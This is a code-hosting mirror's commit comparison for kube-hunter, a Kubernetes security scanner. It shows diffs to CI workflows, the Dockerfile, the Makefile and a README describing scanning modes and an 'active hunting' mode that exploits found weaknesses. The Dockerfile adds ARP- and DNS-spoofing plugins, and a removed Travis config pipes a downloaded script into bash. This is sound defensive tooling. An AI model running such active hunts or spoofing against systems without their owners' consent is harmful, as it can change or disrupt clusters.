mirror of
https://github.com/aquasecurity/kube-hunter.git
synced 2026-02-14 18:09:56 +00:00
Compare commits
102 Commits
refactor_h
...
main
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
bc47f08e88 | ||
|
|
3e1347290b | ||
|
|
7479aae9ba | ||
|
|
e8827b24f6 | ||
|
|
ff9f2c536f | ||
|
|
eb31026d8e | ||
|
|
a578726495 | ||
|
|
c442172715 | ||
|
|
d7df38fc95 | ||
|
|
9ce385a190 | ||
|
|
ebd8e2e405 | ||
|
|
585b490f19 | ||
|
|
6c4ad4f6fd | ||
|
|
e6a3c12098 | ||
|
|
2a7020682e | ||
|
|
e1896f3983 | ||
|
|
fc7fbbf1fc | ||
|
|
7c62cc21af | ||
|
|
c17aa17096 | ||
|
|
4204879251 | ||
|
|
a746bd0eb1 | ||
|
|
b379e64314 | ||
|
|
00eb0dfa87 | ||
|
|
8d045fb1a8 | ||
|
|
83b19d4208 | ||
|
|
473e4fe2b5 | ||
|
|
f67f08225c | ||
|
|
c96312b91e | ||
|
|
a7d26452fb | ||
|
|
e63efddf9f | ||
|
|
6689005544 | ||
|
|
0b90e0e43d | ||
|
|
65eefed721 | ||
|
|
599e9967e3 | ||
|
|
5745f4a32b | ||
|
|
1a26653007 | ||
|
|
cdd9f9d432 | ||
|
|
99678f3cac | ||
|
|
cdbc3dc12b | ||
|
|
d208b43532 | ||
|
|
42250d9f62 | ||
|
|
d94d86a4c1 | ||
|
|
a1c2c3ee3e | ||
|
|
6aeee7f49d | ||
|
|
f95df8172b | ||
|
|
a3ad928f29 | ||
|
|
22d6676e08 | ||
|
|
b9e0ef30e8 | ||
|
|
693d668d0a | ||
|
|
2e4684658f | ||
|
|
f5e8b14818 | ||
|
|
05094a9415 | ||
|
|
8acedf2e7d | ||
|
|
14ca1b8bce | ||
|
|
5a578fd8ab | ||
|
|
bf7023d01c | ||
|
|
d7168af7d5 | ||
|
|
35873baa12 | ||
|
|
a476d9383f | ||
|
|
6a3c7a885a | ||
|
|
b6be309651 | ||
|
|
0d5b3d57d3 | ||
|
|
69057acf9b | ||
|
|
e63200139e | ||
|
|
ad4cfe1c11 | ||
|
|
24b5a709ad | ||
|
|
9cadc0ee41 | ||
|
|
3950a1c2f2 | ||
|
|
7530e6fee3 | ||
|
|
72ae8c0719 | ||
|
|
b341124c20 | ||
|
|
3e06647b4c | ||
|
|
cd1f79a658 | ||
|
|
2428e2e869 | ||
|
|
daf53cb484 | ||
|
|
d6ca666447 | ||
|
|
3ba926454a | ||
|
|
78e16729e0 | ||
|
|
78c0133d9d | ||
|
|
4484ad734f | ||
|
|
a0127659b7 | ||
|
|
f034c8c7a1 | ||
|
|
4cb2c8bad9 | ||
|
|
14d73e201e | ||
|
|
6d63f55d18 | ||
|
|
124a51d84f | ||
|
|
0f1739262f | ||
|
|
9ddf3216ab | ||
|
|
e7585f4ed3 | ||
|
|
6c34a62e39 | ||
|
|
69a31f87e9 | ||
|
|
f33c04bd5b | ||
|
|
11efbb7514 | ||
|
|
ac5dd40b74 | ||
|
|
bf646f5e0c | ||
|
|
a8128b7ea0 | ||
|
|
e75c0ff37b | ||
|
|
fe187bc50a | ||
|
|
77227799a4 | ||
|
|
df12d75d6d | ||
|
|
a4a8c71653 | ||
|
|
fe3dba90d8 |
4
.dockerignore
Normal file
4
.dockerignore
Normal file
@@ -0,0 +1,4 @@
|
||||
*.png
|
||||
tests/
|
||||
docs/
|
||||
.github/
|
||||
6
.flake8
Normal file
6
.flake8
Normal file
@@ -0,0 +1,6 @@
|
||||
[flake8]
|
||||
ignore = E203, E266, E501, W503, B903, T499, B020
|
||||
max-line-length = 120
|
||||
max-complexity = 18
|
||||
select = B,C,E,F,W,B9,T4
|
||||
mypy_config=mypy.ini
|
||||
2
.github/PULL_REQUEST_TEMPLATE.md
vendored
2
.github/PULL_REQUEST_TEMPLATE.md
vendored
@@ -7,7 +7,7 @@
|
||||
Please include a summary of the change and which issue is fixed. Also include relevant motivation and context. List any dependencies that are required for this change.
|
||||
|
||||
## Contribution Guidelines
|
||||
Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
|
||||
Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md).
|
||||
|
||||
## Fixed Issues
|
||||
|
||||
|
||||
14
.github/workflows/lint.yml
vendored
Normal file
14
.github/workflows/lint.yml
vendored
Normal file
@@ -0,0 +1,14 @@
|
||||
---
|
||||
name: Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-20.04
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- uses: actions/setup-python@v2
|
||||
- uses: pre-commit/action@v2.0.0
|
||||
- uses: ibiqlik/action-yamllint@v3
|
||||
95
.github/workflows/publish.yml
vendored
Normal file
95
.github/workflows/publish.yml
vendored
Normal file
@@ -0,0 +1,95 @@
|
||||
---
|
||||
name: Publish
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- "v*"
|
||||
env:
|
||||
ALIAS: aquasecurity
|
||||
REP: kube-hunter
|
||||
jobs:
|
||||
dockerhub:
|
||||
name: Publish To Docker Hub
|
||||
runs-on: ubuntu-18.04
|
||||
steps:
|
||||
- name: Check Out Repo
|
||||
uses: actions/checkout@v2
|
||||
- name: Set up QEMU
|
||||
uses: docker/setup-qemu-action@v1
|
||||
- name: Set up Docker Buildx
|
||||
id: buildx
|
||||
uses: docker/setup-buildx-action@v1
|
||||
- name: Cache Docker layers
|
||||
uses: actions/cache@v2
|
||||
with:
|
||||
path: /tmp/.buildx-cache
|
||||
key: ${{ runner.os }}-buildxarch-${{ github.sha }}
|
||||
restore-keys: |
|
||||
${{ runner.os }}-buildxarch-
|
||||
- name: Login to Docker Hub
|
||||
uses: docker/login-action@v1
|
||||
with:
|
||||
username: ${{ secrets.DOCKERHUB_USER }}
|
||||
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
- name: Login to ECR
|
||||
uses: docker/login-action@v1
|
||||
with:
|
||||
registry: public.ecr.aws
|
||||
username: ${{ secrets.ECR_ACCESS_KEY_ID }}
|
||||
password: ${{ secrets.ECR_SECRET_ACCESS_KEY }}
|
||||
- name: Get version
|
||||
id: get_version
|
||||
uses: crazy-max/ghaction-docker-meta@v3
|
||||
with:
|
||||
images: ${{ env.REP }}
|
||||
tag-semver: |
|
||||
{{version}}
|
||||
|
||||
- name: Build and push - Docker/ECR
|
||||
id: docker_build
|
||||
uses: docker/build-push-action@v2
|
||||
with:
|
||||
context: .
|
||||
platforms: linux/amd64
|
||||
builder: ${{ steps.buildx.outputs.name }}
|
||||
push: true
|
||||
tags: |
|
||||
${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
|
||||
public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
|
||||
${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:latest
|
||||
public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:latest
|
||||
cache-from: type=local,src=/tmp/.buildx-cache/release
|
||||
cache-to: type=local,mode=max,dest=/tmp/.buildx-cache/release
|
||||
|
||||
- name: Image digest
|
||||
run: echo ${{ steps.docker_build.outputs.digest }}
|
||||
|
||||
pypi:
|
||||
name: Publish To PyPI
|
||||
runs-on: ubuntu-18.04
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: '3.9'
|
||||
|
||||
- name: Install dependencies
|
||||
shell: bash
|
||||
run: |
|
||||
pip install -U pip
|
||||
make deps
|
||||
|
||||
- name: Build project
|
||||
shell: bash
|
||||
run: |
|
||||
python -m pip install wheel
|
||||
make build
|
||||
|
||||
- name: Publish distribution package to PyPI
|
||||
if: startsWith(github.ref, 'refs/tags')
|
||||
uses: pypa/gh-action-pypi-publish@master
|
||||
with:
|
||||
password: ${{ secrets.PYPI_API_TOKEN }}
|
||||
55
.github/workflows/release.yml
vendored
Normal file
55
.github/workflows/release.yml
vendored
Normal file
@@ -0,0 +1,55 @@
|
||||
---
|
||||
on:
|
||||
push:
|
||||
# Sequence of patterns matched against refs/tags
|
||||
tags:
|
||||
- 'v*' # Push events to matching v*, i.e. v1.0, v20.15.10
|
||||
|
||||
name: Release
|
||||
|
||||
jobs:
|
||||
build:
|
||||
name: Upload Release Asset
|
||||
runs-on: ubuntu-18.04
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: '3.8'
|
||||
|
||||
- name: Install dependencies
|
||||
shell: bash
|
||||
run: |
|
||||
pip install -U pip
|
||||
pip install pyinstaller
|
||||
make deps
|
||||
|
||||
- name: Build project
|
||||
shell: bash
|
||||
run: |
|
||||
make pyinstaller
|
||||
|
||||
- name: Create Release
|
||||
id: create_release
|
||||
uses: actions/create-release@v1
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
tag_name: ${{ github.ref }}
|
||||
release_name: ${{ github.ref }}
|
||||
draft: false
|
||||
prerelease: false
|
||||
|
||||
- name: Upload Release Asset
|
||||
id: upload-release-asset
|
||||
uses: actions/upload-release-asset@v1
|
||||
env:
|
||||
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
|
||||
with:
|
||||
upload_url: ${{ steps.create_release.outputs.upload_url }}
|
||||
asset_path: ./dist/kube-hunter
|
||||
asset_name: kube-hunter-linux-x86_64-${{ github.ref }}
|
||||
asset_content_type: application/octet-stream
|
||||
55
.github/workflows/test.yml
vendored
Normal file
55
.github/workflows/test.yml
vendored
Normal file
@@ -0,0 +1,55 @@
|
||||
---
|
||||
name: Test
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
env:
|
||||
FORCE_COLOR: 1
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
fail-fast: false
|
||||
matrix:
|
||||
python-version: ["3.6", "3.7", "3.8", "3.9"]
|
||||
os: [ubuntu-20.04, ubuntu-18.04]
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- name: Set up Python ${{ matrix.python-version }}
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
|
||||
- name: Get pip cache dir
|
||||
id: pip-cache
|
||||
run: |
|
||||
echo "::set-output name=dir::$(pip cache dir)"
|
||||
|
||||
- name: Cache
|
||||
uses: actions/cache@v2
|
||||
with:
|
||||
path: ${{ steps.pip-cache.outputs.dir }}
|
||||
key:
|
||||
${{ matrix.os }}-${{ matrix.python-version }}-${{ hashFiles('requirements-dev.txt') }}
|
||||
restore-keys: |
|
||||
${{ matrix.os }}-${{ matrix.python-version }}-
|
||||
|
||||
- name: Install dependencies
|
||||
shell: bash
|
||||
run: |
|
||||
pip install -U pip
|
||||
make dev-deps
|
||||
make install
|
||||
|
||||
- name: Test
|
||||
shell: bash
|
||||
run: |
|
||||
make test
|
||||
|
||||
- name: Upload coverage
|
||||
uses: codecov/codecov-action@v1
|
||||
with:
|
||||
name: ${{ matrix.os }} Python ${{ matrix.python-version }}
|
||||
23
.gitignore
vendored
23
.gitignore
vendored
@@ -1,12 +1,33 @@
|
||||
*.pyc
|
||||
.venv
|
||||
.dockerignore
|
||||
*aqua*
|
||||
venv/
|
||||
.vscode
|
||||
.coverage
|
||||
.idea
|
||||
|
||||
# Distribution / packaging
|
||||
.Python
|
||||
env/
|
||||
build/
|
||||
develop-eggs/
|
||||
dist/
|
||||
downloads/
|
||||
eggs/
|
||||
lib/
|
||||
lib64/
|
||||
parts/
|
||||
sdist/
|
||||
var/
|
||||
*.egg-info/
|
||||
.installed.cfg
|
||||
*.egg
|
||||
*.spec
|
||||
.eggs
|
||||
pip-wheel-metadata
|
||||
|
||||
# Directory Cache Files
|
||||
.DS_Store
|
||||
thumbs.db
|
||||
__pycache__
|
||||
.mypy_cache
|
||||
|
||||
11
.pre-commit-config.yaml
Normal file
11
.pre-commit-config.yaml
Normal file
@@ -0,0 +1,11 @@
|
||||
---
|
||||
repos:
|
||||
- repo: https://github.com/psf/black
|
||||
rev: stable
|
||||
hooks:
|
||||
- id: black
|
||||
- repo: https://gitlab.com/pycqa/flake8
|
||||
rev: 3.7.9
|
||||
hooks:
|
||||
- id: flake8
|
||||
additional_dependencies: [flake8-bugbear]
|
||||
24
.travis.yml
24
.travis.yml
@@ -1,24 +0,0 @@
|
||||
group: travis_latest
|
||||
language: python
|
||||
cache: pip
|
||||
python:
|
||||
#- "3.4"
|
||||
#- "3.5"
|
||||
- "3.6"
|
||||
- "3.7"
|
||||
install:
|
||||
- pip install -r requirements.txt
|
||||
- pip install -r requirements-dev.txt
|
||||
before_script:
|
||||
# stop the build if there are Python syntax errors or undefined names
|
||||
- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
|
||||
# exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
|
||||
- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
|
||||
- pip install pytest coverage pytest-cov
|
||||
script:
|
||||
- python runtest.py
|
||||
after_success:
|
||||
- bash <(curl -s https://codecov.io/bash)
|
||||
notifications:
|
||||
on_success: change
|
||||
on_failure: change # `always` will be the setting once code changes slow down
|
||||
6
.yamllint
Normal file
6
.yamllint
Normal file
@@ -0,0 +1,6 @@
|
||||
---
|
||||
extends: default
|
||||
|
||||
rules:
|
||||
line-length: disable
|
||||
truthy: disable
|
||||
@@ -1,4 +1,17 @@
|
||||
Thank you for taking interest in contributing to kube-hunter!
|
||||
## Contribution Guide
|
||||
|
||||
## Welcome Aboard
|
||||
|
||||
Thank you for taking interest in contributing to kube-hunter!
|
||||
This guide will walk you through the development process of kube-hunter.
|
||||
|
||||
## Setting Up
|
||||
|
||||
kube-hunter is written in Python 3 and supports versions 3.6 and above.
|
||||
You'll probably want to create a virtual environment for your local project.
|
||||
Once you got your project and IDE set up, you can `make dev-deps` and start contributing!
|
||||
You may also install a pre-commit hook to take care of linting - `pre-commit install`.
|
||||
|
||||
## Issues
|
||||
|
||||
- Feel free to open issues for any reason as long as you make it clear if this issue is about a bug/feature/hunter/question/comment.
|
||||
|
||||
29
Dockerfile
29
Dockerfile
@@ -1,25 +1,32 @@
|
||||
FROM python:3.7-alpine3.10 as builder
|
||||
FROM python:3.8-alpine as builder
|
||||
|
||||
RUN apk add --no-cache \
|
||||
linux-headers \
|
||||
tcpdump \
|
||||
build-base \
|
||||
ebtables
|
||||
ebtables \
|
||||
make \
|
||||
git && \
|
||||
apk upgrade --no-cache
|
||||
|
||||
WORKDIR /kube-hunter
|
||||
COPY ./requirements.txt /kube-hunter/.
|
||||
RUN pip install -r /kube-hunter/requirements.txt -t /kube-hunter
|
||||
COPY setup.py setup.cfg Makefile ./
|
||||
RUN make deps
|
||||
|
||||
COPY . /kube-hunter
|
||||
COPY . .
|
||||
RUN make install
|
||||
|
||||
FROM python:3.7-alpine3.10
|
||||
FROM python:3.8-alpine
|
||||
|
||||
RUN apk add --no-cache \
|
||||
tcpdump
|
||||
RUN apk upgrade --no-cache
|
||||
tcpdump \
|
||||
ebtables && \
|
||||
apk upgrade --no-cache
|
||||
|
||||
COPY --from=builder /kube-hunter /kube-hunter
|
||||
COPY --from=builder /usr/local/lib/python3.8/site-packages /usr/local/lib/python3.8/site-packages
|
||||
COPY --from=builder /usr/local/bin/kube-hunter /usr/local/bin/kube-hunter
|
||||
|
||||
WORKDIR /kube-hunter
|
||||
# Add default plugins: https://github.com/aquasecurity/kube-hunter-plugins
|
||||
RUN pip install kube-hunter-arp-spoof>=0.0.3 kube-hunter-dns-spoof>=0.0.3
|
||||
|
||||
ENTRYPOINT ["python", "kube-hunter.py"]
|
||||
ENTRYPOINT ["kube-hunter"]
|
||||
|
||||
67
Makefile
Normal file
67
Makefile
Normal file
@@ -0,0 +1,67 @@
|
||||
.SILENT: clean
|
||||
|
||||
NAME := kube-hunter
|
||||
SRC := kube_hunter
|
||||
ENTRYPOINT := $(SRC)/__main__.py
|
||||
DIST := dist
|
||||
COMPILED := $(DIST)/$(NAME)
|
||||
STATIC_COMPILED := $(COMPILED).static
|
||||
|
||||
|
||||
.PHONY: deps
|
||||
deps:
|
||||
requires=$(shell mktemp)
|
||||
python setup.py -q dependencies > \$requires
|
||||
pip install -r \$requires
|
||||
rm \$requires
|
||||
|
||||
.PHONY: dev-deps
|
||||
dev-deps:
|
||||
pip install -r requirements-dev.txt
|
||||
|
||||
.PHONY: lint
|
||||
lint:
|
||||
black .
|
||||
flake8
|
||||
|
||||
.PHONY: lint-check
|
||||
lint-check:
|
||||
flake8
|
||||
black --check --diff .
|
||||
|
||||
.PHONY: test
|
||||
test:
|
||||
python -m pytest
|
||||
|
||||
.PHONY: build
|
||||
build:
|
||||
python setup.py sdist bdist_wheel
|
||||
|
||||
.PHONY: pyinstaller
|
||||
pyinstaller: deps
|
||||
python setup.py pyinstaller
|
||||
|
||||
.PHONY: staticx_deps
|
||||
staticx_deps:
|
||||
command -v patchelf > /dev/null 2>&1 || (echo "patchelf is not available. install it in order to use staticx" && false)
|
||||
|
||||
.PHONY: pyinstaller_static
|
||||
pyinstaller_static: staticx_deps pyinstaller
|
||||
staticx $(COMPILED) $(STATIC_COMPILED)
|
||||
|
||||
.PHONY: install
|
||||
install:
|
||||
pip install .
|
||||
|
||||
.PHONY: uninstall
|
||||
uninstall:
|
||||
pip uninstall $(NAME)
|
||||
|
||||
.PHONY: publish
|
||||
publish:
|
||||
twine upload dist/*
|
||||
|
||||
.PHONY: clean
|
||||
clean:
|
||||
rm -rf build/ dist/ *.egg-info/ .eggs/ .pytest_cache/ .mypy_cache .coverage *.spec
|
||||
find . -type d -name __pycache__ -exec rm -rf '{}' +
|
||||
183
README.md
183
README.md
@@ -1,41 +1,56 @@
|
||||

|
||||
|
||||
[](https://travis-ci.org/aquasecurity/kube-hunter)
|
||||
[](https://codecov.io/gh/aquasecurity/kube-hunter)
|
||||
[](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE)
|
||||
[](https://microbadger.com/images/aquasec/kube-hunter "Get your own image badge on microbadger.com")
|
||||
|
||||
## Notice
|
||||
kube-hunter is not under active development anymore. If you're interested in scanning Kubernetes clusters for known vulnerabilities, we recommend using [Trivy](https://github.com/aquasecurity/trivy). Specifically, Trivy's Kubernetes [misconfiguration scanning](https://blog.aquasec.com/trivy-kubernetes-cis-benchmark-scanning) and [KBOM vulnerability scanning](https://blog.aquasec.com/scanning-kbom-for-vulnerabilities-with-trivy). Learn more in the [Trivy Docs](https://aquasecurity.github.io/trivy/).
|
||||
|
||||
---
|
||||
|
||||
kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster that you don't own!**
|
||||
|
||||
**Run kube-hunter**: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com) where you can register online to receive a token allowing you to see and share the results online. You can also run the Python code yourself as described below.
|
||||
|
||||
**Explore vulnerabilities**: The kube-hunter knowledge base includes articles about discoverable vulnerabilities and issues. When kube-hunter reports an issue, it will show its VID (Vulnerability ID) so you can look it up in the KB at https://aquasecurity.github.io/kube-hunter/
|
||||
**Explore vulnerabilities**: The kube-hunter knowledge base includes articles about discoverable vulnerabilities and issues. When kube-hunter reports an issue, it will show its VID (Vulnerability ID) so you can look it up in the KB at https://aquasecurity.github.io/kube-hunter/
|
||||
_If you're interested in kube-hunter's integration with the Kubernetes ATT&CK Matrix [Continue Reading](#kuberentes-attck-matrix)_
|
||||
|
||||
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](src/README.md).
|
||||
[kube-hunter demo video](https://youtu.be/s2-6rTkH8a8?t=57s)
|
||||
|
||||
[](https://youtu.be/s2-6rTkH8a8?t=57s)
|
||||
## Table of Contents
|
||||
|
||||
Table of Contents
|
||||
=================
|
||||
- [Table of Contents](#table-of-contents)
|
||||
- [Kubernetes ATT&CK Matrix](#kubernetes-attck-matrix)
|
||||
- [Hunting](#hunting)
|
||||
- [Where should I run kube-hunter?](#where-should-i-run-kube-hunter)
|
||||
- [Scanning options](#scanning-options)
|
||||
- [Authentication](#authentication)
|
||||
- [Active Hunting](#active-hunting)
|
||||
- [List of tests](#list-of-tests)
|
||||
- [Nodes Mapping](#nodes-mapping)
|
||||
- [Output](#output)
|
||||
- [Dispatching](#dispatching)
|
||||
- [Advanced Usage](#advanced-usage)
|
||||
- [Azure Quick Scanning](#azure-quick-scanning)
|
||||
- [Custom Hunting](#custom-hunting)
|
||||
- [Deployment](#deployment)
|
||||
- [On Machine](#on-machine)
|
||||
- [Prerequisites](#prerequisites)
|
||||
- [Install with pip](#install-with-pip)
|
||||
- [Run from source](#run-from-source)
|
||||
- [Container](#container)
|
||||
- [Pod](#pod)
|
||||
- [Contribution](#contribution)
|
||||
- [License](#license)
|
||||
|
||||
## Kubernetes ATT&CK Matrix
|
||||
|
||||
kube-hunter now supports the new format of the Kubernetes ATT&CK matrix.
|
||||
While kube-hunter's vulnerabilities are a collection of creative techniques designed to mimic an attacker in the cluster (or outside it)
|
||||
The Mitre's ATT&CK defines a more general standardised categories of techniques to do so.
|
||||
|
||||
You can think of kube-hunter vulnerabilities as small steps for an attacker, which follows the track of a more general technique he would aim for.
|
||||
Most of kube-hunter's hunters and vulnerabilities can closly fall under those techniques, That's why we moved to follow the Matrix standard.
|
||||
|
||||
_Some kube-hunter vulnerabities which we could not map to Mitre technique, are prefixed with the `General` keyword_
|
||||

|
||||
|
||||
* [Hunting](#hunting)
|
||||
* [Where should I run kube-hunter?](#where-should-i-run-kube-hunter)
|
||||
* [Scanning options](#scanning-options)
|
||||
* [Active Hunting](#active-hunting)
|
||||
* [List of tests](#list-of-tests)
|
||||
* [Nodes Mapping](#nodes-mapping)
|
||||
* [Output](#output)
|
||||
* [Dispatching](#dispatching)
|
||||
* [Deployment](#deployment)
|
||||
* [On Machine](#on-machine)
|
||||
* [Prerequisites](#prerequisites)
|
||||
* [Container](#container)
|
||||
* [Pod](#pod)
|
||||
|
||||
## Hunting
|
||||
|
||||
### Where should I run kube-hunter?
|
||||
|
||||
There are three different ways to run kube-hunter, each providing a different approach to detecting weaknesses in your cluster:
|
||||
@@ -44,7 +59,8 @@ Run kube-hunter on any machine (including your laptop), select Remote scanning a
|
||||
|
||||
You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
|
||||
|
||||
You can also run kube-hunter in a pod within the cluster. This indicates how exposed your cluster would be if one of your application pods is compromised (through a software vulnerability, for example).
|
||||
You can also run kube-hunter in a pod within the cluster. This indicates how exposed your cluster would be if one of your application pods is compromised (through a software vulnerability, for example). (_`--pod` flag_)
|
||||
|
||||
|
||||
### Scanning options
|
||||
|
||||
@@ -55,17 +71,37 @@ By default, kube-hunter will open an interactive session, in which you will be a
|
||||
1. **Remote scanning**
|
||||
|
||||
To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
|
||||
`./kube-hunter.py --remote some.node.com`
|
||||
`kube-hunter --remote some.node.com`
|
||||
|
||||
2. **Interface scanning**
|
||||
|
||||
To specify interface scanning, you can use the `--interface` option (this will scan all of the machine's network interfaces). Example:
|
||||
`./kube-hunter.py --interface`
|
||||
`kube-hunter --interface`
|
||||
|
||||
3. **Network scanning**
|
||||
|
||||
To specify a specific CIDR to scan, use the `--cidr` option. Example:
|
||||
`./kube-hunter.py --cidr 192.168.0.0/24`
|
||||
`kube-hunter --cidr 192.168.0.0/24`
|
||||
|
||||
4. **Kubernetes node auto-discovery**
|
||||
|
||||
Set `--k8s-auto-discover-nodes` flag to query Kubernetes for all nodes in the cluster, and then attempt to scan them all. By default, it will use [in-cluster config](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) to connect to the Kubernetes API. If you'd like to use an explicit kubeconfig file, set `--kubeconfig /location/of/kubeconfig/file`.
|
||||
|
||||
Also note, that this is always done when using `--pod` mode.
|
||||
|
||||
### Authentication
|
||||
In order to mimic an attacker in it's early stages, kube-hunter requires no authentication for the hunt.
|
||||
|
||||
* **Impersonate** - You can provide kube-hunter with a specific service account token to use when hunting by manually passing the JWT Bearer token of the service-account secret with the `--service-account-token` flag.
|
||||
|
||||
Example:
|
||||
```bash
|
||||
$ kube-hunter --active --service-account-token eyJhbGciOiJSUzI1Ni...
|
||||
```
|
||||
|
||||
* When runing with `--pod` flag, kube-hunter uses the service account token [mounted inside the pod](https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/) to authenticate to services it finds during the hunt.
|
||||
* if specified, `--service-account-token` flag takes priority when running as a pod
|
||||
|
||||
|
||||
### Active Hunting
|
||||
|
||||
@@ -73,23 +109,23 @@ Active hunting is an option in which kube-hunter will exploit vulnerabilities it
|
||||
The main difference between normal and active hunting is that a normal hunt will never change the state of the cluster, while active hunting can potentially do state-changing operations on the cluster, **which could be harmful**.
|
||||
|
||||
By default, kube-hunter does not do active hunting. To active hunt a cluster, use the `--active` flag. Example:
|
||||
`./kube-hunter.py --remote some.domain.com --active`
|
||||
`kube-hunter --remote some.domain.com --active`
|
||||
|
||||
### List of tests
|
||||
You can see the list of tests with the `--list` option: Example:
|
||||
`./kube-hunter.py --list`
|
||||
`kube-hunter --list`
|
||||
|
||||
To see active hunting tests as well as passive:
|
||||
`./kube-hunter.py --list --active`
|
||||
`kube-hunter --list --active`
|
||||
|
||||
### Nodes Mapping
|
||||
To see only a mapping of your nodes network, run with `--mapping` option. Example:
|
||||
`./kube-hunter.py --cidr 192.168.0.0/24 --mapping`
|
||||
`kube-hunter --cidr 192.168.0.0/24 --mapping`
|
||||
This will output all the Kubernetes nodes kube-hunter has found.
|
||||
|
||||
### Output
|
||||
To control logging, you can specify a log level, using the `--log` option. Example:
|
||||
`./kube-hunter.py --active --log WARNING`
|
||||
`kube-hunter --active --log WARNING`
|
||||
Available log levels are:
|
||||
|
||||
* DEBUG
|
||||
@@ -98,7 +134,7 @@ Available log levels are:
|
||||
|
||||
### Dispatching
|
||||
By default, the report will be dispatched to `stdout`, but you can specify different methods by using the `--dispatch` option. Example:
|
||||
`./kube-hunter.py --report json --dispatch http`
|
||||
`kube-hunter --report json --dispatch http`
|
||||
Available dispatch methods are:
|
||||
|
||||
* stdout (default)
|
||||
@@ -106,18 +142,75 @@ Available dispatch methods are:
|
||||
* KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost)
|
||||
* KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST)
|
||||
|
||||
|
||||
## Advanced Usage
|
||||
### Azure Quick Scanning
|
||||
When running **as a Pod in an Azure or AWS environment**, kube-hunter will fetch subnets from the Instance Metadata Service. Naturally this makes the discovery process take longer.
|
||||
To hardlimit subnet scanning to a `/24` CIDR, use the `--quick` option.
|
||||
|
||||
### Custom Hunting
|
||||
Custom hunting enables advanced users to have control over what hunters gets registered at the start of a hunt.
|
||||
**If you know what you are doing**, this can help if you want to adjust kube-hunter's hunting and discovery process for your needs.
|
||||
|
||||
Example:
|
||||
```
|
||||
kube-hunter --custom <HunterName1> <HunterName2>
|
||||
```
|
||||
Enabling Custom hunting removes all hunters from the hunting process, except the given whitelisted hunters.
|
||||
|
||||
The `--custom` flag reads a list of hunters class names, in order to view all of kube-hunter's class names, you can combine the flag `--raw-hunter-names` with the `--list` flag.
|
||||
|
||||
Example:
|
||||
```
|
||||
kube-hunter --active --list --raw-hunter-names
|
||||
```
|
||||
|
||||
**Notice**: Due to kube-huner's architectural design, the following "Core Hunters/Classes" will always register (even when using custom hunting):
|
||||
* HostDiscovery
|
||||
* _Generates ip addresses for the hunt by given configurations_
|
||||
* _Automatically discovers subnets using cloud Metadata APIs_
|
||||
* FromPodHostDiscovery
|
||||
* _Auto discover attack surface ip addresses for the hunt by using Pod based environment techniques_
|
||||
* _Automatically discovers subnets using cloud Metadata APIs_
|
||||
* PortDiscovery
|
||||
* _Port scanning given ip addresses for known kubernetes services ports_
|
||||
* Collector
|
||||
* _Collects discovered vulnerabilities and open services for future report_
|
||||
* StartedInfo
|
||||
* _Prints the start message_
|
||||
* SendFullReport
|
||||
* _Dispatching the report based on given configurations_
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Deployment
|
||||
There are three methods for deploying kube-hunter:
|
||||
|
||||
### On Machine
|
||||
|
||||
You can run the kube-hunter python code directly on your machine.
|
||||
You can run kube-hunter directly on your machine.
|
||||
|
||||
#### Prerequisites
|
||||
|
||||
You will need the following installed:
|
||||
* python 3.x
|
||||
* pip
|
||||
|
||||
##### Install with pip
|
||||
|
||||
Install:
|
||||
~~~
|
||||
pip install kube-hunter
|
||||
~~~
|
||||
|
||||
Run:
|
||||
~~~
|
||||
kube-hunter
|
||||
~~~
|
||||
|
||||
##### Run from source
|
||||
Clone the repository:
|
||||
~~~
|
||||
git clone https://github.com/aquasecurity/kube-hunter.git
|
||||
@@ -130,15 +223,18 @@ pip install -r requirements.txt
|
||||
~~~
|
||||
|
||||
Run:
|
||||
`./kube-hunter.py`
|
||||
~~~
|
||||
python3 kube_hunter
|
||||
~~~
|
||||
|
||||
_If you want to use pyinstaller/py2exe you need to first run the install_imports.py script._
|
||||
|
||||
### Container
|
||||
